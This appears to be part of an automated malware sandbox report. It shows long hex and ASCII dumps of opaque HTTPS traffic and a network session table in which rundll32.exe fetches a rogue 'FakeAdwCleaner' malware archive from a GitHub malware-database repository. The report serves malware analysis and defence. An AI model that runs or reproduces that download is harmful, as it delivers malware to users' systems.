                                                                                                                                                    2022-09-29 12:59:07 UTC11530INData Raw: 35 a0 58 8f 2f f5 e8 30 df b3 ed 98 7f c3 2e 69 41 a6 fa 69 86 93 b3 b7 26 15 f0 6d 61 57 99 d4 02 fb 8d 84 cc 5b 0d ab 30 6d c0 04 4b 41 0c e3 91 1a 3b 03 92 a4 ad 99 d9 2e 83 d4 7a 51 18 2b 96 f9 46 37 88 63 f7 30 0b c5 a3 26 96 b1 f1 ce 52 cc 5c 5c 4c e6 62 de 9d aa 4c f7 9a 59 80 fb 44 bf 4f 8a 03 05 54 69 b4 70 96 a2 35 b9 84 21 7d 63 79 65 df ba 7a 76 4f ba 8b 04 15 bb 68 50 01 35 97 6e 8c f0 3b 2d 8e ca 8d 4f 19 dc 52 1b 64 ba 9a 58 21 10 4c a6 1f ed 6d 3d 51 68 be d4 97 60 3b 6c 29 62 32 53 d6 eb 64 1f 91 0b 18 e6 32 ff 77 ac 65 2f 6a 22 64 95 8a ee f1 05 04 04 eb f1 e1 e4 4c c2 25 cd 7c 29 90 27 52 a1 f3 d4 99 b2 2e 4e 38 d7 34 06 53 a4 23 25 48 67 25 75 d4 e5 83 72 dc fe fe 42 2a 7d 27 68 e4 26 ce 97 df 2d ea 79 3a d2 b1 35 cc 57 e3 25 a2 86 24
                                                                                                                                                    Data Ascii: 5X/0.iAi&maW[0mKA;.zQ+F7c0&R\\LbLYDOTip5!}cyezvOhP5n;-ORdX!Lm=Qh`;l)b2Sd2we/j"dL%|)'R.N84S#%Hg%urB*}'h&-y:5W%$
                                                                                                                                                    2022-09-29 12:59:07 UTC11546INData Raw: fd 36 3a 68 9e 6c 4a 58 ce 63 f5 63 54 14 52 72 2f eb a1 c5 c7 a7 0b 3c dc b0 65 e0 1f b2 f4 c0 e9 8f 71 1e 41 f7 9c 73 7f 1b 4a 06 bf 57 f4 94 5c f1 50 4e 40 65 f9 12 0e 1c 64 3f 36 50 6a 84 99 58 dd 8f 0c 31 92 1e 0e 33 d6 ac 91 8a ca dc 22 f5 38 d0 82 f0 21 09 24 da 64 03 5c a0 9b 4b 50 1e 55 af e1 6a 7f 84 4f 45 10 3b 1e fe c7 31 8a 61 70 93 e8 f5 8d ca d5 99 4e ee ce 38 0b e9 45 f4 f0 c9 39 24 f1 53 50 6d 87 41 17 90 b5 1f 22 df 6d 59 c3 47 a2 8b 22 34 33 55 af 78 43 7e c1 a6 62 23 b7 71 98 b2 a4 a8 7f 37 26 1e 55 b4 03 cd bb b0 09 6d d9 77 c6 5f 70 e5 47 60 79 22 2b 6f 74 b9 55 06 4e 53 3c 5b 95 63 0e 56 2a 00 55 9f cb 2d ef c5 ed f5 43 31 bc 71 9e f9 cb ca 5a f5 7b 10 52 f3 b5 ae ac 0f 45 34 3b 94 4c ac 7a c3 6a 3b 13 b0 93 86 61 29 32 b3 d8 c2 b2
                                                                                                                                                    Data Ascii: 6:hlJXccTRr/<eqAsJW\PN@ed?6PjX13"8!$d\KPUjOE;1apN8E9$SPmA"mYG"43UxC~b#q7&Umw_pG`y"+otUNS<[cV*U-C1qZ{RE4;Lzj;a)2
                                                                                                                                                    2022-09-29 12:59:07 UTC11562INData Raw: dc 86 37 cd 84 85 39 22 e7 78 d5 7f 48 98 98 7c 20 34 76 1b 5f 57 70 5d 9f ec d1 2a 6b 2c f2 ca f5 9b 33 32 11 01 f3 87 57 cd 78 a7 48 53 7b c2 03 e7 60 85 89 53 07 55 48 6d 23 af fc 63 36 08 af 6b 0f a3 42 5f 81 34 f3 55 5e 81 63 af d3 86 c5 da 91 c3 e9 53 68 0d 7c a9 fa 58 2d d7 ec 3e d6 50 fa 45 19 9a 88 be 9a bf cf 9b 14 5c d3 4d 98 b3 fd fe 13 ae b2 4c cb b6 ec c6 87 7c f4 0e 34 10 f8 95 1f 5a c3 42 45 94 53 41 9d 4f 8a 28 48 e6 d4 c6 27 1d 01 ea 4d 3f ce 61 8c 3a 45 5b 7e 7a eb 04 50 da 4f 31 3a 20 62 fa 1e 9b 77 ca a3 76 6c fb 1d cc 1b 9d 79 4d 1d 3e 32 e6 ce f6 e4 59 7b 29 88 16 5a 86 dd 10 fe 2f 1e 55 1d 06 ba 86 45 3f 25 8f 04 29 69 2c 45 2b 1d 6a 6c 06 fb e4 42 c7 46 af 00 3c f8 dc b0 92 e3 22 df 67 a3 45 58 38 f8 54 26 11 a7 e8 be f8 56 65 1c
                                                                                                                                                    Data Ascii: 79"xH| 4v_Wp]*k,32WxHS{`SUHm#c6kB_4U^cSh|X->PE\ML|4ZBESAO(H'M?a:E[~zPO1: bwvlyM>2Y{)Z/UE?%)i,E+jlBF<"gEX8T&Ve
                                                                                                                                                    2022-09-29 12:59:07 UTC11578INData Raw: 70 3c 08 80 eb b6 ca a2 0c df 9c 88 0b 0e 31 97 be 88 a1 70 da 56 6e 84 c8 59 b4 7b e8 1a 30 c6 90 b3 5f 90 e2 0f 24 67 5a fa 17 61 2c c4 b0 51 23 f1 71 6d fe 87 e7 b0 e4 1b 9d 20 ab e6 d2 3d 49 e4 53 c8 84 98 11 5a 6d bb 94 25 6f fb 20 32 57 d4 ce 53 97 dd 3f 07 b4 e7 0c ac b2 18 4d 80 f0 69 1f 91 4c f3 89 bb 55 87 72 9a 89 70 ab 17 26 3a 18 5e f7 ab f9 94 05 04 d6 1b d9 c8 1e 0f e1 7c 29 1c 72 5c fc 9d b3 9e f8 af 46 ae 02 12 a0 a9 51 3b b0 0f 30 39 c6 c9 6c c5 f3 0b fc 0d d6 bf 3a 0f fd 25 2e b5 a5 f2 a7 4c 22 23 0f bc 68 dc f9 08 40 77 9f 5e 42 4c 77 64 0d 87 ef b2 28 71 40 6d a9 fa 27 49 3b 0b d6 7f fc 81 57 9c 7c 1b 74 8b 9a 24 8c e2 d2 9d 4a fc 30 28 6c dc 37 65 2f 9c 56 52 ff 0d 41 a3 e1 f1 c0 7a 22 52 4b 54 c4 28 59 4b 94 1f 7b 58 e2 02 09 76 66
                                                                                                                                                    Data Ascii: p<1pVnY{0_$gZa,Q#qm =ISZm%o 2WS?MiLUrp&:^|)r\FQ;09l:%.L"#h@w^BLwd(q@m'I;W|t$J0(l7e/VRAz"RKT(YK{Xvf
                                                                                                                                                    2022-09-29 12:59:07 UTC11594INData Raw: fb 52 37 61 a3 24 2c de 7d a0 04 97 ca 56 e3 a9 3c a8 57 88 01 22 c1 e7 7c 53 c2 54 03 86 d3 c2 6d ae 12 8a a8 b5 e2 81 c1 42 bf 0e f5 70 15 88 a4 78 39 e0 e4 77 58 06 74 6d 61 e6 b0 59 99 c9 db e5 14 51 69 86 0e c6 35 09 d5 83 54 0c 7a 8d b1 a0 87 96 28 2b 0a 2a 5d 0e f3 7d ee ae 9b 86 f7 de e0 d7 1c 30 89 e9 2a 33 e0 7f 3a 99 5b 06 f3 b9 c3 ca 1b 12 d2 b6 49 f2 bc e6 81 d8 58 ff 47 d8 00 53 00 de 95 fe e0 cc a5 fb 98 ea ac ad 34 88 1a c1 3e c4 6c bd ce e6 96 e6 35 26 04 5f ce 1d f9 b6 8d c6 d4 d7 85 c1 8e d3 94 83 33 2b 52 ac 17 f3 55 f8 54 84 1f 3e 19 f8 5c ef c3 1e 8b 0b a7 14 a3 50 db 94 64 62 53 08 82 dd 08 e0 92 1f 88 57 03 65 39 3f a7 37 5c fb 58 8a 8d 87 ed 87 d8 77 9a 49 e3 f2 ee 53 db 5c 50 c3 a9 19 df 7b ca 73 46 73 d9 8e 7e dd 07 df b3 5b be
                                                                                                                                                    Data Ascii: R7a$,}V<W"|STmBpx9wXtmaYQi5Tz(+*]}0*3:[IXGS4>l5&_3+RUT>\PdbSWe9?7\XwIS\P{sFs~[
                                                                                                                                                    2022-09-29 12:59:07 UTC11610INData Raw: 09 55 14 7e b8 6e 72 d2 1b a9 1b 6f 51 2b f4 3c 0d 1f 2c 88 14 80 ed e4 5b 3e 09 8f 92 a0 3b 9b 1c dd 09 f1 6e ca c5 fc 8c cd 95 01 87 df de 27 4e db 01 d2 5a ac 7f 8a ce 8b 24 c0 09 94 30 b6 fc bc 78 25 34 b2 41 b6 a3 bc 75 cd 87 b7 3d c3 b3 10 cd d2 dd a4 a3 16 92 ff cc 9c 61 ca 7a 7d 5a 80 cb 4a 20 5f bb be 1a 8d 8c f2 45 27 84 9c c2 a8 b6 14 00 e0 d3 c5 d0 95 c8 e0 7e d1 5c 19 c2 bd ee 7c 6c 98 18 9c b8 dd 68 68 ee 34 fb 3c 89 ae 42 0d 88 fd 70 2c 42 81 f3 08 5b a8 46 4b 34 15 05 03 22 17 b6 d7 18 f7 b9 5c 26 75 7c 32 b5 c4 ca 14 09 7b eb 74 19 90 51 9a 8a ad a3 8a e6 7e bc 47 44 10 df bd ef ec 89 d0 05 f5 69 dd fc 4d f2 11 d3 89 8e 7b 95 02 d1 2b e5 6d a7 46 e2 25 ee b9 e4 a0 2e e6 c6 41 9d 5c 94 4f 2c 06 9f 85 4c 23 19 d2 15 c2 99 03 33 a7 1c 02 55
                                                                                                                                                    Data Ascii: U~nroQ+<,[>;n'NZ$0x%4Au=az}ZJ _E'~\|lhh4<Bp,B[FK4"\&u|2{tQ~GDiM{+mF%.A\O,L#3U
                                                                                                                                                    2022-09-29 12:59:07 UTC11626INData Raw: 4b ce 72 69 52 67 85 bf 1d 97 6b 23 bd 57 ea 5f 9e 43 74 e9 f6 1d 3e 5c 03 cc ee c8 02 53 b1 9d a3 2c 33 94 22 93 c4 80 51 f3 67 fb 85 d1 44 5f 85 7a 80 be 60 71 d5 e9 33 66 c6 fe c9 86 ea 09 0e ef 82 1b aa a9 5b 0e 33 29 77 4c 31 b1 73 52 ed 57 c7 bc 59 12 77 ee 25 ee 07 08 44 79 95 8a 9f e7 85 9b 99 ed b2 91 2d 25 93 a5 1d 79 f0 84 47 3c f1 15 cf 86 fe 67 30 2a 03 13 6d 02 86 61 03 38 68 5a 44 c8 58 a7 9e 59 09 b4 66 18 24 47 f7 2f 1c 01 9c 86 9b 63 e6 8d 9e c7 9b f6 38 58 a3 95 b5 84 65 43 b4 77 b4 34 31 b4 b7 fd 4c 95 f4 be fd d3 34 30 4b 0b ad 2d b6 ce 08 59 b6 c3 2f 8f d1 cc 01 03 08 d1 16 9c 03 97 ee b7 51 bc cd 8b 8e 55 fd 0b 01 aa eb 6e fa f8 26 0f 68 1e c8 ab 79 85 8d c1 b7 64 d4 07 82 5e e4 de e2 c0 fc fb 2c 97 cc f2 e0 f9 e1 26 c8 1d c2 55 67
                                                                                                                                                    Data Ascii: KriRgk#W_Ct>\S,3"QgD_z`q3f[3)wL1sRWYw%Dy-%yG<g0*ma8hZDXYf$G/c8XeCw41L40K-Y/QUn&hyd^,&Ug
                                                                                                                                                    2022-09-29 12:59:07 UTC11642INData Raw: 52 3f 33 ac cd ac e3 13 a2 1d c7 b1 8f d0 da 7d 42 5a bf a4 c1 bc 48 16 ad 0c 20 92 34 a2 8b cc c4 82 85 46 bf e5 bc 5f a9 13 90 5d a3 a7 3c 03 87 45 01 cf 84 78 b2 a8 08 ab c9 f5 a1 bb eb 95 79 6a 3c bc 04 0f eb e5 2e 0f e3 54 96 6f 5e 6c 59 48 1b 28 aa ed e8 8a 62 45 b1 be 33 0a 53 f7 0a 71 0d 38 ae c6 c1 22 b6 48 be 1f 51 0d a5 fc e1 0d 8f 38 e3 f8 28 1e 0f 02 eb da f5 05 57 c5 64 41 c7 20 6d a8 e1 1b 4c 1d b1 ba 84 18 37 fb d9 21 48 1a 49 20 2d 36 4d f1 31 da 7e b8 d5 f9 49 a3 ac b0 05 6b fc 17 ba 89 ff d1 66 d7 ce 07 02 a6 ee 6e 03 41 97 a6 bd 45 84 10 9c c5 80 de 75 77 1c 36 e0 62 37 1a f3 45 cf 24 c5 3d 51 bb 0c 33 3e ee 46 cf c4 39 c9 f3 22 95 1a 26 8b e3 75 77 45 bc a8 bd 0e 80 e8 fd 38 00 5d 4c 2f 14 e3 09 26 3f 1c a6 ec b4 dc 39 c2 c1 25 bb fb
                                                                                                                                                    Data Ascii: R?3}BZH 4F_]<Exyj<.To^lYH(bE3Sq8"HQ8(WdA mL7!HI -6M1~IkfnAEuw6b7E$=Q3>F9"&uwE8]L/&?9%
                                                                                                                                                    2022-09-29 12:59:07 UTC11658INData Raw: a9 dc 29 52 1d d8 26 0c 74 40 91 9a ae 29 cb 1f f0 4b 0b 11 bd 97 20 13 53 1f 0f 5d 60 b7 5a 33 ee b1 ef 0f a6 3c 83 31 17 fa d0 cd 05 93 80 60 30 65 fa 5a 80 71 4b bb fb fa cb 6f ef ea 3a a8 e3 d8 44 a2 6e 6c af 2f 98 24 eb 12 07 14 c8 ae 72 25 0c bd 25 2f e7 f6 55 13 0b 3a 11 a4 76 45 29 8f e0 1a 6a f1 15 ac 0a 27 e8 43 7d 84 bd 3a fa 36 84 dd 4f 21 84 48 5e 93 8e 33 b9 dd f0 4a 08 19 72 2e 67 db a0 a3 ec 55 92 c8 51 12 a5 4c f7 d7 78 e6 08 38 40 d8 68 28 04 7e a1 18 a8 44 3a f0 10 6c 3c 36 af b8 d8 d2 76 a2 07 b4 ad 5f 7d e1 df 0f 90 b4 65 7f 12 37 3a 6e 18 0a d0 76 1b 74 61 c1 ad 76 36 ae 20 43 ed 16 c9 45 7a f1 35 ed 46 d8 6f f5 64 b2 18 bf 8f 6a ad cb aa 27 7d 25 59 f1 0c 66 18 f8 66 9b 4e 87 7e c6 51 41 36 b8 b6 ab 3e a9 3a d2 5c 0f fd e2 34 51 3c
                                                                                                                                                    Data Ascii: )R&t@)K S]`Z3<1`0eZqKo:Dnl/$r%%/U:vE)j'C}:6O!H^3Jr.gUQLx8@h(~D:l<6v_}e7:nvtav6 CEz5Fodj'}%YffN~QA6>:\4Q<
                                                                                                                                                    2022-09-29 12:59:07 UTC11674INData Raw: fb 94 9b 9e 41 f5 f3 b1 08 bf 17 23 e0 f8 1f 60 03 39 0b 7f 37 e1 45 cf 62 1d 2f fa 18 d1 b0 1d ef bd d9 56 51 4a a0 cf 08 87 0f 28 71 5b 0a 90 40 65 4a b9 80 83 56 7d 37 6f 64 f4 4a f7 d1 d6 3c 66 84 c3 01 87 da 1c e5 33 ed 15 70 19 db 94 b5 3b 22 bd 37 74 90 15 06 5d 51 c0 36 67 63 ab 1f f6 6c 2d 56 db 73 0d 21 3e d8 1c a5 43 ba 8f 03 1d bf 7d 84 08 4c 39 65 16 65 33 7e d9 a9 ec ee 40 e1 e4 b0 16 35 4c e6 46 18 7f ef 9e 95 13 5f 43 62 68 bd 05 a5 2a ee 1b 5b 3c b5 08 a6 44 04 3b b9 fd 50 d8 62 e2 04 d4 00 09 0d df 5a ac ff 4a 49 0f f9 e5 60 8e 38 a7 e6 b6 0a 76 ad c5 9f 6d 88 80 6f 80 bf 41 3e b5 9e 27 e5 6d 04 5b a8 5c ce 84 df 17 b1 82 d8 7f ef 1d dc e5 9f fa c1 62 71 0e c6 af 9f 99 10 89 72 66 55 9f 72 b0 0a cc 51 34 a2 c3 41 a0 6c d1 a4 34 11 cf 05
                                                                                                                                                    Data Ascii: A#`97Eb/VQJ(q[@eJV}7odJ<f3p;"7t]Q6gcl-Vs!>C}L9ee3~@5LF_Cbh*[<D;PbZJI`8vmoA>'m[\bqrfUrQ4Al4
                                                                                                                                                    2022-09-29 12:59:07 UTC11690INData Raw: 2e ac 64 02 28 0d af 04 74 6a 71 ec 43 bf 96 a5 e0 27 c9 f8 18 20 91 52 5e b7 b7 b4 0c b1 fd 31 8d 09 1d 32 00 b5 29 88 6b 0b a7 98 e1 1e 82 7b f8 87 73 e2 a6 5a 52 68 fa a8 a5 ca 67 bf 70 f9 76 e6 16 51 0d 9a 13 2d b5 d5 21 94 d1 68 3b f5 59 5a 49 2d 6b d6 18 df 47 07 d3 d6 5a 4f b7 be 21 c0 fe ad 46 6d e0 19 49 49 ac 99 b6 a8 c6 73 ca df 39 ae f6 41 79 36 74 e6 43 0e 44 92 04 33 56 4b f3 b1 08 b2 bb 62 a6 26 19 0d 4b 74 29 98 75 88 40 6e 1a 6c f7 08 5e f2 4a a9 33 e9 bf d9 ea 77 d1 73 36 ed c0 fb 35 05 54 c6 3b b0 57 9d 9f 59 f0 6d be ee 60 84 bb 6f 72 d5 64 43 11 16 02 d2 34 ae ac 61 55 e3 54 f2 37 83 18 c8 40 b1 76 74 eb 13 6a 36 55 ff b1 40 9f 6b 97 30 df b8 7b a0 4b 18 4d 73 b4 e9 56 63 de fc 7f 1f df 75 ec 08 e8 b8 b3 fa 06 a7 4a bf b9 37 0c b1 8f
                                                                                                                                                    Data Ascii: .d(tjqC' R^12)k{sZRhgpvQ-!h;YZI-kGZO!FmIIs9Ay6tCD3VKb&Kt)u@nl^J3ws65T;WYm`ordC4aUT7@vtj6U@k0{KMsVcuJ7
                                                                                                                                                    2022-09-29 12:59:07 UTC11706INData Raw: bb 33 ad e6 29 54 b1 3d 2f e7 02 db ae da e5 65 4f 91 4c ee 0d a1 6a 84 30 51 92 0b 5d 09 ab d2 1f 87 5f 72 d8 d1 53 0a 61 cb 42 19 20 6d 42 91 48 16 3e de 7f 84 af c1 e8 83 89 d4 d7 a9 53 27 90 7e 46 3e 93 be 00 98 7b 1b 57 13 e3 16 2c 0b 8a 8d 00 02 67 90 66 66 28 da 57 dd 57 b9 2e e1 4f a9 2b 94 89 3a 32 cc f8 0c 36 62 1c 7c c8 c2 97 33 cf c1 89 41 ff aa 9a ee 66 0c 72 32 83 9f 67 ec 4e f2 47 74 35 6e cb d1 70 a1 f5 c0 a9 d8 d4 11 46 56 a4 c6 3b 9f 56 72 73 dc 0d da 9e ff 8a bf 31 bf df eb 6b 82 3e 0b 3b cc ea a5 d1 0d 13 77 7d 7d f0 ef 94 5f d1 da d1 7a 95 94 ce 26 f7 f8 c8 26 48 b4 3d 87 e5 e9 a6 d2 6f 9b 33 af 57 df 84 e0 78 2e c7 27 30 b3 ab 76 76 69 8b 71 23 46 f8 80 2e 7c 44 93 15 e9 41 98 8b a4 17 e7 e8 6e 76 f1 c6 26 b6 28 d2 8e 91 2f 56 a5 e3
                                                                                                                                                    Data Ascii: 3)T=/eOLj0Q]_rSaB mBH>S'~F>{W,gff(WW.O+:26b|3Afr2gNGt5npFV;Vrs1k>;w}}_z&&H=o3Wx.'0vviq#F.|DAnv&(/V
                                                                                                                                                    2022-09-29 12:59:07 UTC11722INData Raw: 62 81 ae 94 9d 79 2b 47 72 85 a9 cd 35 fb 74 07 fe aa 21 17 c5 39 cc a1 fe de db 93 d1 14 da 48 b8 8c 9c 0b f1 d2 d3 59 91 c4 3c e8 9f 98 28 0a 9f 0f 04 28 68 f7 fd 10 d0 4a c4 eb d3 83 48 cc 38 f1 26 b3 5d 67 70 ea 84 08 89 76 7d f6 3e d8 44 41 bd b3 e9 8b 0b e4 fb 3a 1b 35 ad c3 a1 86 08 a1 77 28 a9 4a b1 a4 f2 a1 f1 b1 8b 0b ab 26 55 9f 7b 1a 5c 96 79 61 53 a7 b8 2b 1d de 34 9b 04 36 aa db 57 b1 e6 f0 b3 ef f6 1d f4 a5 8a 2d 72 7e 88 5a 74 17 92 5a fc f1 5e c1 ef 71 b1 09 71 e9 bd 22 71 f0 72 ef 77 8d e0 a2 08 27 3f c5 e5 0e 2f 74 be bf 45 89 c1 b5 8c f8 82 5a 39 6b a5 be bf bc 43 30 8f 1f 20 48 a0 f9 2b a6 76 7d 02 29 64 b3 eb 1c 05 4e 83 d0 ba 8c e6 fa 98 06 f4 86 cf e0 c4 66 9a b0 71 ed 68 3e 42 19 a1 64 f6 2f 19 44 7e f6 4c 35 5f 45 c2 da c4 b4 54
                                                                                                                                                    Data Ascii: by+Gr5t!9HY<((hJH8&]gpv}>DA:5w(J&U{\yaS+46W-r~ZtZ^qq"qrw'?/tEZ9kC0 H+v})dNfqh>Bd/D~L5_ET
                                                                                                                                                    2022-09-29 12:59:07 UTC11738INData Raw: 95 4e eb 4f 8d 90 d0 bf a5 64 ab 71 48 02 03 86 99 b0 41 12 fb 89 36 a1 9f db ee a6 9d 78 39 67 61 8a 0a c5 30 61 56 bd 56 7d 41 ca e2 ff ac 0a 44 96 de 14 c5 2d 1d de 47 73 25 13 2a 3d b2 3a 96 34 61 6e 41 38 6b 10 f8 7c 5a 8f a4 88 27 91 b7 84 25 c8 f6 91 41 02 a6 1d 32 15 aa c7 34 58 55 f2 19 de d8 6a ee e9 61 57 ef 0a 12 64 2d 4c 7c 27 09 4c 04 68 2e 4a 8b 0f 6b e3 71 2a e1 27 a8 0f a8 e6 fa c5 8a 34 cd 2a f9 64 7f 9e 61 e4 60 41 9e 1f aa 38 16 14 d8 bc e7 a1 81 a3 ef 5d f6 ae db 5d 8d 2f 72 dd b5 fd ef 9b 1e c6 2f 32 ad 36 8f 45 c8 94 88 ac 8c 2d 37 9f 10 45 48 f0 bd 1b 21 e7 89 d7 96 4a 72 2a 7b bb 97 a6 c8 7d 2d d9 a5 a7 c6 fc 3d 27 40 85 46 e7 fb 88 ed 1f 15 a7 d7 38 ed 1e 67 70 73 8a 98 6e f7 fe 00 35 ac fd d4 10 c7 b2 6b c4 54 37 34 ae a3 eb 99
                                                                                                                                                    Data Ascii: NOdqHA6x9ga0aVV}AD-Gs%*=:4anA8k|Z'%A24XUjaWd-L|'Lh.Jkq*'4*da`A8]]/r/26E-7EH!Jr*{}-='@F8gpsn5kT74
                                                                                                                                                    2022-09-29 12:59:07 UTC11754INData Raw: 68 7f 1f 7f b9 f1 b3 d5 67 cd 1d 5d b8 54 24 b9 8b 27 5e 32 0c 4c 9b 08 7a 4a 81 a2 76 82 8e b3 64 85 ca 23 b4 56 cc ab f2 b2 1a 18 f5 96 b1 2f 9f fa ea 81 b6 5a d0 96 93 5f b7 88 a9 d6 fe d2 8c 24 b9 e6 e5 c0 ec b9 2d cd 95 47 fe 7f f1 db 2c 24 02 4b af c9 3c ad f5 cf fd 40 5a d6 80 ce 57 1e 84 c8 d7 e7 dd df b4 73 7a fb 06 8e ed ce bf a9 5a 9e 51 80 1f b7 8c b4 8b ca 14 fe d3 00 19 2d a8 9c 1a 9d e1 bf 0a f6 5f dc 8a 3e ab 6f 4d 47 98 44 eb 3f 73 7e b0 9c 95 12 56 a5 cc f8 f3 a3 ec 5d 2e 48 4b 5d ab da 5f 6e a4 31 9e 40 0d 15 b5 ba 7a 10 b1 df 61 c2 34 b4 c1 4d 8e a5 53 dc 9a 1f 72 13 4a 3a 93 21 99 28 55 56 77 c9 a5 58 b5 13 f8 0b 8b a5 0f 34 e3 c2 84 9e 0f 2b 52 a7 31 8a 02 d1 85 66 4f b0 43 61 33 2f 84 cd 21 41 0e 55 9d 8a 17 f4 b8 bc b5 4b c2 e4 9d
                                                                                                                                                    Data Ascii: hg]T$'^2LzJvd#V/Z_$-G,$K<@ZWszZQ-_>oMGD?s~V].HK]_n1@za4MSrJ:!(UVwX4+R1fOCa3/!AUK
                                                                                                                                                    2022-09-29 12:59:07 UTC11770INData Raw: 2c f6 00 60 99 2b 12 7e b1 56 af 1d 18 2a e3 a6 cd 9d b5 f8 1a 03 2e 1a c3 35 ac 87 a6 c0 aa f1 96 86 f9 6b 6f 8e 6f fa 2d a6 6e 66 75 e3 6b b1 d3 b1 0b 05 52 ea 73 d9 47 a7 ca fa 0f 04 6e 94 e7 ab 54 32 55 e1 82 91 16 f6 a5 33 e5 d0 a4 59 37 8a 1a 50 bb 98 d5 6d 6b aa 42 7b aa f1 33 22 5e d5 49 01 c5 66 b0 72 d9 37 68 d3 92 a6 e2 a8 17 7d 79 7b 3b 29 e1 bc b6 c6 2c 4c 22 f8 ea 80 61 72 07 58 97 e3 4f d8 3d 25 3e 60 1e 9e da 66 2f ee 6e 6c 7c ca e6 4a da e1 4e cc 36 22 f6 ef d1 87 04 5c 36 b6 09 54 c0 f9 a5 a5 9a 56 0c b5 6f 77 68 74 31 96 ae ab 40 6e 61 38 1f c3 1e 37 31 08 cf 52 64 e4 8f dc 26 9d af 71 9d f0 c0 dc 3e ae 1a 7f b1 ad 71 f1 8a 34 16 dc 81 77 1f 16 6c 0c 69 39 42 cf 4a 17 6d a8 c8 9c 78 c9 91 33 9e b4 32 e6 3d 40 f5 20 de 38 2e 1a 1a 93 ca
                                                                                                                                                    Data Ascii: ,`+~V*.5koo-nfukRsGnT2U3Y7PmkB{3"^Ifr7h}y{;),L"arXO=%>`f/nl|JN6"\6TVowht1@na871Rd&q>q4wli9BJmx32=@ 8.
                                                                                                                                                    2022-09-29 12:59:07 UTC11786INData Raw: b9 51 18 a1 86 d2 cb 0b 4a 2c a4 7b 1a fc 92 f4 6f 17 f2 d2 d9 1f dd e3 18 86 58 1f 04 9b d9 d6 6e 80 e4 fd a7 7b 2b 80 df b5 01 75 73 f7 93 62 67 4c b1 f3 42 fd bb 81 57 21 c2 70 76 c2 bb 7b 6f c6 2d da 73 e7 36 78 e2 0c 46 fe 54 bc 66 db 12 34 f2 52 5c f0 aa d8 70 9a cf ae 90 6b 49 a6 e4 4c 99 37 35 07 cd 9e 1f 92 8d c7 c4 f2 27 1b f5 36 a4 43 b8 bb 5f 13 85 8b bd 09 47 ad 38 e7 98 a7 0d aa c2 01 2c 5a 2d a3 9f 3c 0d cf 77 02 cb 62 d7 4c 22 a8 de b4 cc 92 4c 26 64 26 aa a2 4e 9e 7b b6 70 76 42 cb eb 17 bc bc c8 97 d1 00 0d a4 eb 68 d6 e4 41 21 25 71 9f 78 ee 62 74 55 13 13 99 54 b5 27 36 33 a6 0b 2b dc 3a d5 82 99 17 3c de 38 1f 44 bf 28 84 f8 da b6 2d 26 f3 09 5b 46 2a 66 08 94 64 71 f2 f6 0c 15 0e a7 07 a4 68 e0 99 a2 37 fd 56 12 f4 01 96 0b 04 dd e7
                                                                                                                                                    Data Ascii: QJ,{oXn{+usbgLBW!pv{o-s6xFTf4R\pkIL75'6C_G8,Z-<wbL"L&d&N{pvBhA!%qxbtUT'63+:<8D(-&[F*fdqh7V
                                                                                                                                                    2022-09-29 12:59:07 UTC11802INData Raw: 66 7c fa 11 b2 59 2d 19 54 f1 ea c8 23 df fe 18 1d 6d 97 6d 8a b3 e8 3b ad 5b c6 89 6d ec 1f ba 04 7d ce a2 98 0c dd 85 d4 3e 1c cf 51 5c a6 ce 36 a8 0a bc 88 64 2c 9b cd 58 6e ae c7 6d a4 87 20 6e f4 5f f6 6e 09 8d 91 80 72 2f 3d d6 64 05 1e e3 fc bd 84 5e f0 fb a9 1d 73 6d 15 22 df 70 87 98 dc c6 f6 ae 21 19 ce 00 f4 53 2d 6e 35 7a ab 2a e0 85 30 4b f2 f2 52 4c 0c 31 5c fc b4 cb 7e a1 55 85 bd 90 d0 d3 9e 10 25 2f 33 6e 0b 6e 62 e4 f8 7f a4 0b 38 1b 8d 7e 0d 13 1f b1 e1 a9 45 39 a7 31 bf d6 5d 5a 15 61 b3 11 7b 5c e8 75 80 71 04 d8 d6 b5 50 c7 3a 68 4c 66 99 a8 30 75 64 e2 6e ed 48 41 a0 83 93 8b 2d d2 ae e5 9c a5 91 73 cb 3e 63 b1 dc 28 71 86 d6 35 2c 26 36 6f 93 d6 d5 b0 6f f6 f2 2f fb 19 e6 b1 a6 b4 19 3f bd 70 b0 e6 93 0f e5 62 64 8f 43 d8 aa 87 19
                                                                                                                                                    Data Ascii: f|Y-T#mm;[m}>Q\6d,Xnm n_nr/=d^sm"p!S-n5z*0KRL1\~U%/3nnb8~E91]Za{\uqP:hLf0udnHA-s>c(q5,&6oo/?pbdC
                                                                                                                                                    2022-09-29 12:59:07 UTC11818INData Raw: 1e a5 c6 7f 5e 5b 51 3c 8f 3b cc 9b fd 67 6d 64 e4 c6 22 d1 91 00 43 75 71 76 a8 67 d9 d7 b1 5d b0 f7 4a f5 bd 16 7e df 77 b0 b7 78 4c e9 ba 9c 25 cc e5 fd 10 8e b6 cd 23 9a a0 f8 2e 63 e0 ba da 2d 71 57 50 f5 9e e5 b5 83 ab 19 47 01 58 7c 50 8e ce 3c ec 1c 15 8f be 42 f7 1d a8 5d 4e b8 7b 08 7b 1c 6c 7d 31 42 ff 56 39 dd 3b bc e4 ae 73 bb 89 ec ba bd 9b 91 d7 33 4a 96 bd 5b d0 b5 81 46 99 fd fc d5 71 43 7b 3a 5a a1 1c c0 71 ef 02 31 66 c1 6b f9 37 96 50 a7 66 d1 9d 51 9f ec 87 4d e7 81 f7 30 7d 19 23 bf 36 5e 25 9a f2 0a ea 9a 2f 14 ae 8d 2b 77 4f 60 a8 5f db e8 3d 59 f7 53 8e ff de be 37 05 ed a6 d0 a1 f4 b6 c0 b4 6e d2 25 63 e1 be e9 df 32 d0 26 38 38 d8 6d 4d 6e f3 38 30 c8 f2 11 33 84 3d 4d ae c9 21 a9 9d a2 25 a7 b4 58 9d 5f 2c 8a ba 43 ee 99 39 34
                                                                                                                                                    Data Ascii: ^[Q<;gmd"Cuqvg]J~wxL%#.c-qWPGX|P<B]N{{l}1BV9;s3J[FqC{:Zq1fk7PfQM0}#6^%/+wO`_=YS7n%c2&88mMn803=M!%X_,C94


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    77192.168.2.349746140.82.121.3443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                    2022-09-29 12:59:07 UTC11824OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/FakeAdwCleaner.zip HTTP/1.1
                                                                                                                                                    Host: github.com


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                    78140.82.121.3443192.168.2.349746C:\Users\user\Desktop\07bb0738.exe
                                                                                                                                                    TimestampkBytes transferredDirectionData
